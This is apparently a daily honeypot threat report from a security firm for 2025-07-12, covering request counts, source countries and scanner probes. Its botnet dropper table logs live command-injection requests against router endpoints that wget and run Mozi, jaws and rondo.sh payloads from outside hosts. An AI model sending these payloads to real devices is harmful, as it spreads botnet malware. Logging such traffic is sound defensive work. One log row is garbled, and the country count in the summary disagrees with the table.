Report: 2025-07-12

Author
Shoggoth Industries

Daily Report: 2025-07-12

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 12 stage 1 IP addresses, linked to 6 dropper URLs.

There are 12 new requests that have never been observed before (these were added to the monitored request database).

A total of 1241 requests were recorded during the day, originating from 12 different countries, with a peak of 225 requests coming from DE.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

source_country  targeted_country
US              Germany
JP              Germany
DE              Germany
BR              Germany
BR              Germany
DE              Germany
US              Dubai
CN              Georgia

botnet_dropper_behaviour

remote_addr      request
8.222.219.91     GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
47.100.64.195    GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
117.72.66.27     GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
36.255.4.827;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
223.155.21.37    GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
87.121.84.34     GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-
45.115.89.178    GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.115.89.178:59093/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
118.194.249.197  GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.135.88     GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
36.156.102.59    GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.135.194.11    GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F169.255.72.169%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1
117.72.211.135   GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request

The requests listed here are those that have not yet been integrated into the request database.

     number_of_occurence  request
124  1                    GET /shell.aspx HTTP/1.1
223  1                    GET /laravel/vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1
224  1                    GET /public/vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1
225  1                    GET /core/vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1
226  1                    GET /vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1
420  1                    GET /Nmap/folder/check1752313936 HTTP/1.1
425  1                    GET /NmapUpperCheck1752313936 HTTP/1.1
433  1                    GET /OEXp HTTP/1.1
436  1                    GET /nmaplowercheck1752313936 HTTP/1.1
474  1                    GET /rs/application-about HTTP/1.1
475  1                    GET /json/login_session HTTP/1.1
476  1                    GET /photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1 HTTP/1.1

country_iso_code

    number_of_occurence  country_iso_code
0   225                  DE
1   179                  US
2   167                  CN
3   150                  GB
4   86                   FR
5   83                   RU
6   56                   HK
7   55                   SG
8   42                   PL
9   34                   KR
10  30                   NL
11  28                   ZA
12  16                   BG
13  12                   GH
14  11                   SC
15  8                    MU
16  8                    BR
17  7                    UA
18  5                    BE
19  5                    JP
20  4                    AO
21  4                    SE
22  4                    IN
23  3                    KZ
24  2                    AU
25  2                    AE
26  2                    LV
27  2                    LA
28  2                    IL
29  2                    ES
30  2                    IE
31  1                    NG
32  1                    AR
33  1                    TH
34  1                    EE
35  1                    MK
